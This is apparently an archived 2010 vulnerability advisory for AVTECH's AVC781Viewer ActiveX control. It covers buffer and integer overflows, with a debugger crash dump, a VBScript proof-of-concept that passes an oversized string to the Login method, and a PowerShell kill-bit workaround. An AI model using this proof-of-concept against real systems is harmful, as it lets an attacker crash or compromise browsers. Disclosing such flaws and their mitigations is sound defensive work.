Archive for April 19th, 2010

AVTECH Software (AVC781Viewer.dll) ActiveX Multiple Remote Vulnerabilities

Vendor: AVTECH Software, Inc.
Product Web Page:

Summary: AVTECH Software, a private corporation founded in 1988, is a computer software and
hardware manufacturer specializing in providing Windows NT/2K/XP/2K3 products to monitor
multi-OS computers and network issues throughout a department or an entire enterprise.
Once issues or events occur, AVTECH Software products use today’s most advanced alerting
technologies to communicate critical and important status information to remote system
managers and IT professionals via mobile phones, pagers, PDAs, email, the web and more.
Automatic corrective actions can also be taken to immediately resolve issues, run scripts,
and shutdown/restart servers or applications.

AVTECH Software is now the premier worldwide manufacturer of environment monitoring equipment
specifically designed to monitor today’s advanced computer rooms and data centers. Our Room Alert
and TemPageR products are used to monitor environmental conditions in many of the world’s most
secure data centers and are installed in almost every branch of the US government.

Description: AVTECH Software’s AVC781Viewer ActiveX Control suffers from multiple remote vulnerabilities,
including a buffer overflow, an integer overflow and a denial of service (Internet Explorer crash). These
issues are triggered when an attacker convinces a victim user to visit a malicious website.

Remote attackers may exploit this issue to execute arbitrary machine code in the context of
the affected application, facilitating the remote compromise of affected computers. Failed
exploit attempts likely result in browser crashes.


Disasm: 10006C23    MOV [EAX],CL    (AVC_AX_724_VIEWER.dll)

Seh Chain:
1     10022F68     AVC_AX_724_VIEWER.dll
2     FC2950     VBSCRIPT.dll
3     7C839AC0     KERNEL32.dll

Called From                   Returns To
AVC_AX_724_VIEWER.10006C23    AVC_AX_724_VIEWER.10044508
AVC_AX_724_VIEWER.10044508    AVC_AX_724_VIEWER.100097B0
AVC_AX_724_VIEWER.100097B0    8244C8B

EIP 10006C23
EBX 00180724 -> Uni: defaultV
ECX 0013EE41 -> 24001827 -> Uni: '$'$
EDI 001827BC -> Uni: defaultV
ESI 00180724 -> Uni: defaultV
EBP 00FE4658 -> 10044530 -> Asc: 0E0E
ESP 0013EE40 -> 001827BC

Block Disassembly:
10006C12    MOV EAX,[EBP+144]
10006C18    ADD EAX,60
10006C1B    JMP SHORT 10006C20
10006C1D    LEA ECX,[ECX]
10006C20    MOV CL,[EDX]
10006C22    INC EDX
10006C23    MOV [EAX],CL      <-- CRASH
10006C25    INC EAX
10006C26    TEST CL,CL
10006C28    JNZ SHORT 10006C20
10006C2A    MOV EAX,[ESP+20]
10006C2E    ADD EAX,-10
10006C31    LEA ECX,[EAX+C]
10006C37    LOCK XADD [ECX],EDX

EBP+8    00FE4658 -> 10044530 -> Asc: 0E0E
EBP+16    0018AB44 -> Uni: defaultV
EBP+20    00180A54 -> Uni: defaultV
EBP+24    00000001
EBP+28    00000001

Stack Dump:
13EE40 BC 27 18 00 24 07 18 00 F4 EE 13 00 74 1F 18 00  [.'..$.......t...]
13EE50 AC F1 13 00 68 2F 02 10 FF FF FF FF B7 9B 00 10  [....h/..........]
13EE60 00 28 18 00 74 1F 18 00 BC 27 18 00 24 07 18 00  [.(..t....'..$...]
13EE70 5C 07 18 00 F4 EE 13 00 00 00 00 00 D8 DD 47 00  [\.............G.]
13EE80 58 46 FE 00 08 00 00 00 08 00 13 00 44 4A 12 77  [XF..........DJ.w]


Proof Of Concept:

<object classid='clsid:8214B72E-B0CD-466E-A44D-1D54D926038D' id='kungfuhustle' />
<script language='vbscript'>

' Fuzzer-template metadata describing the targeted method (informational only)
targetFile = "C:\WINDOWS\system32\AVC_AX_724_VIEWER.dll"
prototype  = "Sub Login ( ByVal Username As String, ByVal Password As String, ByVal MediaType As String, ByVal ConnectType As String )"
memberName = "Login"
progid     = "AVC781Viewer.CV781Object"
argCount   = 4

' Oversized first argument; arg2..arg4 are left uninitialised (Empty)
arg1=String(1010, "A")

kungfuhustle.Login arg1 ,arg2 ,arg3 ,arg4

</script>
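Workaround (an example added here, not part of the original advisory or any vendor guidance): until a fixed control is available, setting the Internet Explorer kill bit for the control's CLSID (the one from the PoC above) stops IE from instantiating it from any web page. Assumes a Windows host with Internet Explorer and an elevated PowerShell session.

```powershell
# Set the IE "kill bit" (Compatibility Flags = 0x400) for the AVC781Viewer control.
# CLSID taken from the advisory's PoC; run from an elevated PowerShell (assumption).
$clsid   = '{8214B72E-B0CD-466E-A44D-1D54D926038D}'
$killBit = 0x400

$paths = @(
    "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$clsid",
    # 32-bit IE on 64-bit Windows reads the Wow6432Node hive; harmless on 32-bit hosts
    "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$clsid"
)

foreach ($p in $paths) {
    if (-not (Test-Path $p)) { New-Item -Path $p -Force | Out-Null }
    # OR the kill bit into any flags already present instead of overwriting them
    $existing = (Get-ItemProperty -Path $p -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
    $flags = [int]$existing -bor $killBit
    Set-ItemProperty -Path $p -Name 'Compatibility Flags' -Value $flags -Type DWord
}

# Verify: report the stored flags and whether the kill bit is set under each path
foreach ($p in $paths) {
    $flags = (Get-ItemProperty -Path $p -Name 'Compatibility Flags').'Compatibility Flags'
    $state = if ($flags -band $killBit) { 'set' } else { 'NOT set' }
    '{0}: 0x{1:X} (kill bit {2})' -f $p, $flags, $state
}
```

The kill bit only blocks instantiation by IE and other hosts that honour it; the vulnerable DLL stays on disk, so updating or removing it is still required.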


More info: